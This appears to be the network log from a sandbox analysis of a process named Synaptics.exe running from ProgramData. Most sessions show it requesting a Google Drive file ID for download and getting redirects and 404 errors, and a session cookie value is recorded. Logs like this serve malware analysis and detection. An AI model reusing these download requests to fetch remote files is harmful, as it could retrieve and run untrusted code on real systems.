2024-12-30 10:25:31 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC5MvLyBwa8cpkm-cIC40TsSoimjmFTDOUmW5JeDBTBLcS-Av4CijJsAqW86510K9SvtM0KOmZ4 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:31 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-3CKXsYcSHndQmAwXC3b2xA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:31 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:31 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 58 4d 6d 42 41 39 70 6a 4a 37 47 4b 6a 52 66 38 54 50 65 57 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="VXMmBA9pjJ7GKjRf8TPeWA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:31 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.10	49855	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:31 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:25:31 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:31 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'report-sample' 'nonce-6lEziK5e4w4ZJnv1LvdNqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.10	49856	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:31 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:31 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC4A0sEJFeHwGe_52zzgMOsA38mO7domKpCcqJ7ek366q72KDgG6U_9Fah0051hIjw27nQv4kNE Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:31 GMT Content-Security-Policy: script-src 'report-sample' 'nonce-K63tw7EZ2mURmvhzZHAcrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:31 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:31 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 36 49 4a 78 70 4e 42 6f 65 4a 7a 75 76 37 76 45 47 2d 6b 36 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="n6IJxpNBoeJzuv7vEG-k6g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:31 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.10	49863	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:32 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:25:32 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:32 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'report-sample' 'nonce-hxaeZj2lZFaiSFqQj1oJpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.10	49864	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:32 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:32 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC45bHsJ1YtaMwu9UYCm7n4iCs5LgthaoLfe7xqmInIlKZ9oxKuP3jMDS-DGMnSBmUaGhlTY-xg Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:32 GMT Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-jk49jBxwmjncTB3pqeNwig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:32 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:32 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 74 6e 58 45 55 5f 4d 58 5a 70 41 6f 31 67 44 34 39 48 48 4f 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="5tnXEU_MXZpAo1gD49HHOg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:32 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.10	49865	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:32 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:25:32 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:32 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-ikofxBV5TFxiV1u7sWfp0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.10	49866	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:32 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:32 UTC	1243	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC7Ff6acbOuDFgK3GHZ9HNiq2Ey2S2O4SqJdufCM1UKpXHaybB3gAozCEpmup54Ly4rU Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:32 GMT Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-6m7IAFn-LbfP86daIHlkkw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:32 UTC	147	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:32 UTC	1390	IN	Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 67 37 31 48 56 76 7a 57 37 4f 66 37 4b 4c 7a 75 73 5a 56 33 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: t Found)!!1</title><style nonce="Yg71HVvzW7Of7KLzusZV3w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:32 UTC	115	IN	Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.10	49874	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:33 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.10	49875	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:33 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.10	49877	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:33 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.10	49876	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:33 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.10	49887	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:34 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
